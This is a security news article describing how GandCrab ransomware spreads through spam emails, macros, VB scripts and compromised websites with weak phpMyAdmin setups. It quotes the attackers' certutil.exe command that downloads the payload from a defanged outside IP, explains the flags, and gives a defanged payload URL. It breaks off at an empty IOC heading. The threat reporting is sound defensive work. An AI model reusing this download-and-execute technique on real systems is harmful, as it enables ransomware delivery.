Gandcrab Ransomware Attack being targeted users via compromised websites and leveraged multiple MySQL vulnerabilities to attack various windows users.
Most of the small-medium businesses websites are not aware of new vulnerabilities that released to compromise the websites.
Gandcrab Ransomware is wide spreading Ransomware nowadays with newly updated futures under constant development to target various countries.
It keeps leveraging the thousands of vulnerabilities in Million of web pages and actively targeting users to comprise the system and encrypt to demand the ransom amount.
Apart from this Sophisticated malware are distributed through the legitimate website by compromising the legitimate system.
Gandcrab Ransomware attackers widely scanning the internet web pages to find out the vulnerable websites and leverage it to distribute the ransomware in wide.
Gandcrab Ransomware Infection Vectors
Initially, Gandcrab Ransomware being distributed around the end of the April via a large-scale Email spam campaign that posed as an online order.
Email holds an attached Zip file contains a word document with macros that downloads and executes the Gandcrab ransomware.
Few of other Spam email champaign contain a VB script instead of zipping that has an ability to pull off the ransomware payload by connecting its command & control server.
Also this Malware using a system utility to download the payload and it leveraging certutil.exe which is command line utility that is installed as part of Certificate Services.
Also, it using specific syntax used to download the payload and install into the vicitms machine.
certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe
C:UsersADMINI~1AppDataLocalTempFVAacW.exe
- -urlcache flag is designed to be used to display or delete URL-cached entries
- -f -split flags, the adversaries are able to force the URL to be downloaded to the location
Later on, the file will be executed and install the Gandcrab Ransomware within the target system.
Later on, Cisco researchers observed that the same campaign being distributed from a different location which is an actual legitimate website (www[.]pushpakcourier[.]net) and validated it by successfully downloading the payload from hxxp://www[.]pushpakcourier[.]net/js/kukul.exe.
Further investigation revealed that the compromised website is running by phpMyAdmin which contains default credentials and multiple MySQL vulnerabilities which was helped to the attacker to leverage it and distribute the ransomware.
Later it will encrypt the victim files and.CRAB extension appended to the file’s name. for example, it Image.jpg will change as Image.jpg.CRAB.
After the complete infection, it displays the ransom notes that contain an information about the payment and the ways to communicate with attackers.
Gandcrab IOC Hashes:
